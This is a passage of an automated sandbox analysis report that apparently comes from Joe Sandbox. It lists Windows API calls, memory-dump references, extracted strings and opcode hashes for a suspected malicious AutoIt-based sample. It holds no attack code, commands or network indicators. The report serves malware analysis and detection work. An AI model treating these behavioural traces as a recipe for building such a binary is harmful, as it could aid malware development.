                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1582027408-0
                                      • Opcode ID: 193433f3f8e1b98160fa11060439f142fa5c6717d3ac5f1fc0b8005c8fdd6887
                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                      • Opcode Fuzzy Hash: 193433f3f8e1b98160fa11060439f142fa5c6717d3ac5f1fc0b8005c8fdd6887
                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CloseConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 3217815495-966354055
                                      • Opcode ID: 0f4c566cd1d9a6693945dcf2a379bf59af4861f489475630134aeb02386c0df3
                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                      • Opcode Fuzzy Hash: 0f4c566cd1d9a6693945dcf2a379bf59af4861f489475630134aeb02386c0df3
                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004566AE
                                      • GetDesktopWindow.USER32 ref: 004566C3
                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                      • DestroyWindow.USER32(?), ref: 00456746
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                      • CopyRect.USER32(?,?), ref: 004568BE
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                      • String ID: ($,$tooltips_class32
                                      • API String ID: 225202481-3320066284
                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                      • API String ID: 790654849-32604322
                                      • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                      • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window
                                      • String ID: 0
                                      • API String ID: 2353593579-4108050209
                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                      • String ID:
                                      • API String ID: 1744303182-0
                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                      • API String ID: 0-1896584978
                                      • Opcode ID: c7b3ca60bbd7daa56e48a85a1f5ff4706a5dc4aec21eac7656b22477555bf00a
                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                      • Opcode Fuzzy Hash: c7b3ca60bbd7daa56e48a85a1f5ff4706a5dc4aec21eac7656b22477555bf00a
                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2485277191-404129466
                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                      APIs
                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                      • GetDesktopWindow.USER32 ref: 0045476F
                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                      APIs
                                      • _wcslen.LIBCMT ref: 00464B28
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                      • _wcslen.LIBCMT ref: 00464C28
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                      • _wcslen.LIBCMT ref: 00464CBA
                                      • _wcslen.LIBCMT ref: 00464CD0
                                      • _wcslen.LIBCMT ref: 00464CEF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$Directory$CurrentSystem
                                      • String ID: D
                                      • API String ID: 1914653954-2746444292
                                      • Opcode ID: b511d5d46a2f222ce4ed19d723d2e1c07e7d50b7fc8ed091f368405c23ed7f49
                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                      • Opcode Fuzzy Hash: b511d5d46a2f222ce4ed19d723d2e1c07e7d50b7fc8ed091f368405c23ed7f49
                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                      • API String ID: 3832890014-4202584635
                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                      APIs
                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                      • GetFocus.USER32 ref: 0046A0DD
                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$CtrlFocus
                                      • String ID: 0
                                      • API String ID: 1534620443-4108050209
                                      • Opcode ID: a68c403fe95e7eee9a99d276bf3bac304a732c7a84dd9b32010b3f1c6bd811a5
                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                      • Opcode Fuzzy Hash: a68c403fe95e7eee9a99d276bf3bac304a732c7a84dd9b32010b3f1c6bd811a5
                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004558E3
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CreateDestroy
                                      • String ID: ,$tooltips_class32
                                      • API String ID: 1109047481-3856767331
                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 3631882475-2268648507
                                      • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                      • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
